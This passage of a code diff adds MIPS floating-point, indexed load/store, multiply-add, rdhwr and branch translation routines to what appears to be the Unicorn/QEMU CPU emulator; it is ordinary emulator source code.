"add.ps"; + break; + case OPC_SUB_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = 
tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_sub_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "sub.ps"; + break; + case OPC_MUL_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_mul_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mul.ps"; + break; + case OPC_ABS_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_abs_ps(tcg_ctx, fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "abs.ps"; + break; + case OPC_MOV_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mov.ps"; + break; + case OPC_NEG_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_chs_ps(tcg_ctx, fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "neg.ps"; + break; + case OPC_MOVCF_PS: + check_cp1_64bitmode(ctx); + gen_movcf_ps(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); + opn = "movcf.ps"; + break; + case OPC_MOVZ_PS: + check_cp1_64bitmode(ctx); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i64 fp0; + + if (ft != 0) + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[ft], 0, l1); + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + opn = "movz.ps"; + break; + 
case OPC_MOVN_PS: + check_cp1_64bitmode(ctx); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i64 fp0; + + if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[ft], 0, l1); + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + } + opn = "movn.ps"; + break; + case OPC_ADDR_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, ft); + gen_load_fpr64(ctx, fp1, fs); + gen_helper_float_addr_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "addr.ps"; + break; + case OPC_MULR_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, ft); + gen_load_fpr64(ctx, fp1, fs); + gen_helper_float_mulr_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mulr.ps"; + break; + case OPC_RECIP2_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_recip2_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip2.ps"; + break; + case OPC_RECIP1_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_recip1_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip1.ps"; + break; + case OPC_RSQRT1_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = 
tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_rsqrt1_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt1.ps"; + break; + case OPC_RSQRT2_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_rsqrt2_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt2.ps"; + break; + case OPC_CVT_S_PU: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, fs); + gen_helper_float_cvts_pu(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "cvt.s.pu"; + break; + case OPC_CVT_PW_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_cvtpw_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "cvt.pw.ps"; + break; + case OPC_CVT_S_PL: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_cvts_pl(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "cvt.s.pl"; + break; + case OPC_PLL_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_store_fpr32h(ctx, fp0, fd); + gen_store_fpr32(ctx, fp1, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + } + opn = "pll.ps"; + break; + case OPC_PLU_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = 
tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32h(ctx, fp1, ft); + gen_store_fpr32(ctx, fp1, fd); + gen_store_fpr32h(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + } + opn = "plu.ps"; + break; + case OPC_PUL_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_store_fpr32(ctx, fp1, fd); + gen_store_fpr32h(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + } + opn = "pul.ps"; + break; + case OPC_PUU_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, fs); + gen_load_fpr32h(ctx, fp1, ft); + gen_store_fpr32(ctx, fp1, fd); + gen_store_fpr32h(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + } + opn = "puu.ps"; + break; + case OPC_CMP_F_PS: + case OPC_CMP_UN_PS: + case OPC_CMP_EQ_PS: + case OPC_CMP_UEQ_PS: + case OPC_CMP_OLT_PS: + case OPC_CMP_ULT_PS: + case OPC_CMP_OLE_PS: + case OPC_CMP_ULE_PS: + case OPC_CMP_SF_PS: + case OPC_CMP_NGLE_PS: + case OPC_CMP_SEQ_PS: + case OPC_CMP_NGL_PS: + case OPC_CMP_LT_PS: + case OPC_CMP_NGE_PS: + case OPC_CMP_LE_PS: + case OPC_CMP_NGT_PS: + if (ctx->opcode & (1 << 6)) { + gen_cmpabs_ps(ctx, func-48, ft, fs, cc); + opn = condnames_abs[func-48]; + } else { + gen_cmp_ps(ctx, func-48, ft, fs, cc); + opn = condnames[func-48]; + } + break; + default: + MIPS_INVAL(opn); + generate_exception (ctx, EXCP_RI); + return; + } + (void)opn; /* avoid a compiler warning */ + switch (optype) { + case BINOP: + MIPS_DEBUG("%s %s, %s, %s", opn, fregnames[fd], fregnames[fs], fregnames[ft]); + break; + case CMPOP: + MIPS_DEBUG("%s %s,%s", opn, fregnames[fs], fregnames[ft]); + break; + default: + MIPS_DEBUG("%s %s,%s", opn, 
fregnames[fd], fregnames[fs]); + break; + } +} + +/* Coprocessor 3 (FPU) */ +/* gen_flt3_ldst: emit TCG code for the COP1X indexed FPU load/store group + (loads LWXC1/LDXC1/LUXC1, stores SWXC1/SDXC1/SUXC1). 'fd' is the FPR + written by a load, 'fs' the FPR read by a store; the effective address + is GPR[base] + GPR[index]. */ +static void gen_flt3_ldst (DisasContext *ctx, uint32_t opc, + int fd, int fs, int base, int index) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "extended float load/store"; + int store = 0; + TCGv t0 = tcg_temp_new(tcg_ctx); + + /* Effective address = GPR[base] + GPR[index]; register 0 reads as + zero, so when either operand is r0 just load the other one. */ + if (base == 0) { + gen_load_gpr(ctx, t0, index); + } else if (index == 0) { + gen_load_gpr(ctx, t0, base); + } else { + gen_op_addr_add(ctx, t0, *cpu_gpr[base], *cpu_gpr[index]); + } + /* Don't do NOP if destination is zero: we must perform the actual + memory access. */ + switch (opc) { + case OPC_LWXC1: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + /* 32-bit load; t0 doubles as address and load result before + the truncate into the FPR. */ + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESL); + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "lwxc1"; + break; + case OPC_LDXC1: + check_cop1x(ctx); + check_cp1_registers(ctx, fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ld_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "ldxc1"; + break; + case OPC_LUXC1: + check_cp1_64bitmode(ctx); + /* LUXC1 masks off the low 3 address bits (8-byte-aligns the + access) instead of faulting. */ + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x7); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_qemu_ld_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "luxc1"; + break; + case OPC_SWXC1: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + tcg_gen_qemu_st_i32(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEUL); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "swxc1"; + store = 1; + break; + case OPC_SDXC1: + check_cop1x(ctx); + check_cp1_registers(ctx, fs); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + tcg_gen_qemu_st_i64(ctx->uc, fp0, t0, ctx->mem_idx, 
MO_TEQ); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "sdxc1"; + store = 1; + break; + case OPC_SUXC1: + check_cp1_64bitmode(ctx); + /* As with LUXC1: 8-byte-align the effective address. */ + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x7); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + tcg_gen_qemu_st_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "suxc1"; + store = 1; + break; + } + tcg_temp_free(tcg_ctx, t0); + (void)opn; (void)store; /* avoid compiler warnings */ + MIPS_DEBUG("%s %s, %s(%s)", opn, fregnames[store ? fs : fd], + regnames[index], regnames[base]); +} + +static void gen_flt3_arith (DisasContext *ctx, uint32_t opc, + int fd, int fr, int fs, int ft) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "flt3_arith"; + + switch (opc) { + case OPC_ALNV_PS: + check_cp1_64bitmode(ctx); + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv_i32 fp = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fph = tcg_temp_new_i32(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t0, fr); + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x7); + + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 0, l1); + gen_load_fpr32(ctx, fp, fs); + gen_load_fpr32h(ctx, fph, fs); + gen_store_fpr32(ctx, fp, fd); + gen_store_fpr32h(ctx, fph, fd); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 4, l2); + tcg_temp_free(tcg_ctx, t0); +#ifdef TARGET_WORDS_BIGENDIAN + gen_load_fpr32(ctx, fp, fs); + gen_load_fpr32h(ctx, fph, ft); + gen_store_fpr32h(ctx, fp, fd); + gen_store_fpr32(ctx, fph, fd); +#else + gen_load_fpr32h(ctx, fph, fs); + gen_load_fpr32(ctx, fp, ft); + gen_store_fpr32(ctx, fph, fd); + gen_store_fpr32h(ctx, fp, fd); +#endif + gen_set_label(tcg_ctx, l2); + tcg_temp_free_i32(tcg_ctx, fp); + tcg_temp_free_i32(tcg_ctx, fph); + } + opn = "alnv.ps"; + break; + case OPC_MADD_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = 
tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fr); + gen_helper_float_madd_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + } + opn = "madd.s"; + break; + case OPC_MADD_D: + check_cop1x(ctx); + check_cp1_registers(ctx, fd | fs | ft | fr); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_madd_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "madd.d"; + break; + case OPC_MADD_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_madd_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "madd.ps"; + break; + case OPC_MSUB_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fr); + gen_helper_float_msub_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + } + opn = 
"msub.s"; + break; + case OPC_MSUB_D: + check_cop1x(ctx); + check_cp1_registers(ctx, fd | fs | ft | fr); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_msub_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "msub.d"; + break; + case OPC_MSUB_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_msub_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "msub.ps"; + break; + case OPC_NMADD_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fr); + gen_helper_float_nmadd_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + } + opn = "nmadd.s"; + break; + case OPC_NMADD_D: + check_cop1x(ctx); + check_cp1_registers(ctx, fd | fs | ft | fr); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_nmadd_d(tcg_ctx, fp2, 
tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "nmadd.d"; + break; + case OPC_NMADD_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_nmadd_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "nmadd.ps"; + break; + case OPC_NMSUB_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fr); + gen_helper_float_nmsub_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + } + opn = "nmsub.s"; + break; + case OPC_NMSUB_D: + check_cop1x(ctx); + check_cp1_registers(ctx, fd | fs | ft | fr); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_nmsub_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "nmsub.d"; + break; + case OPC_NMSUB_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = 
tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_nmsub_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "nmsub.ps"; + break; + default: + MIPS_INVAL(opn); + generate_exception (ctx, EXCP_RI); + return; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s, %s", opn, fregnames[fd], fregnames[fr], + fregnames[fs], fregnames[ft]); +} + +static void gen_rdhwr(DisasContext *ctx, int rt, int rd) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv t0; + +#if !defined(CONFIG_USER_ONLY) + /* The Linux kernel will emulate rdhwr if it's not supported natively. + Therefore only check the ISA in system mode. */ + check_insn(ctx, ISA_MIPS32R2); +#endif + t0 = tcg_temp_new(tcg_ctx); + + switch (rd) { + case 0: + save_cpu_state(ctx, 1); + gen_helper_rdhwr_cpunum(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case 1: + save_cpu_state(ctx, 1); + gen_helper_rdhwr_synci_step(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case 2: + save_cpu_state(ctx, 1); + gen_helper_rdhwr_cc(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case 3: + save_cpu_state(ctx, 1); + gen_helper_rdhwr_ccres(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case 29: +#if defined(CONFIG_USER_ONLY) + tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + gen_store_gpr(tcg_ctx, t0, rt); + break; +#else + if ((ctx->hflags & MIPS_HFLAG_CP0) || + (ctx->hflags & MIPS_HFLAG_HWRENA_ULR)) { + tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + gen_store_gpr(tcg_ctx, t0, rt); + } else { + generate_exception(ctx, EXCP_RI); + } + break; +#endif + default: /* 
Invalid */ + MIPS_INVAL("rdhwr"); + generate_exception(ctx, EXCP_RI); + break; + } + tcg_temp_free(tcg_ctx, t0); +} + +static void gen_branch(DisasContext *ctx, int insn_bytes) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + if (ctx->hflags & MIPS_HFLAG_BMASK) { + int proc_hflags = ctx->hflags & MIPS_HFLAG_BMASK; + /* Branches completion */ + ctx->hflags &= ~MIPS_HFLAG_BMASK; + ctx->bstate = BS_BRANCH; + save_cpu_state(ctx, 0); + /* FIXME: Need to clear can_do_io. */ + switch (proc_hflags & MIPS_HFLAG_BMASK_BASE) { + case MIPS_HFLAG_FBNSLOT: + MIPS_DEBUG("forbidden slot"); + gen_goto_tb(ctx, 0, ctx->pc + insn_bytes); + break; + case MIPS_HFLAG_B: + /* unconditional branch */ + MIPS_DEBUG("unconditional branch"); + if (proc_hflags & MIPS_HFLAG_BX) { + tcg_gen_xori_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, MIPS_HFLAG_M16); + } + gen_goto_tb(ctx, 0, ctx->btarget); + break; + case MIPS_HFLAG_BL: + /* blikely taken case */ + MIPS_DEBUG("blikely branch taken"); + gen_goto_tb(ctx, 0, ctx->btarget); + break; + case MIPS_HFLAG_BC: + /* Conditional branch */ + MIPS_DEBUG("conditional branch"); + { + int l1 = gen_new_label(tcg_ctx); + + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->bcond, 0, l1); + gen_goto_tb(ctx, 1, ctx->pc + insn_bytes); + gen_set_label(tcg_ctx, l1); + gen_goto_tb(ctx, 0, ctx->btarget); + } + break; + case MIPS_HFLAG_BR: + /* unconditional branch to register */ + MIPS_DEBUG("branch to register"); + if (ctx->insn_flags & (ASE_MIPS16 | ASE_MICROMIPS)) { + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_andi_tl(tcg_ctx, t0, *(TCGv *)tcg_ctx->btarget, 0x1); + tcg_gen_trunc_tl_i32(tcg_ctx, t1, t0); + tcg_temp_free(tcg_ctx, t0); + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, ~(uint32_t)MIPS_HFLAG_M16); + 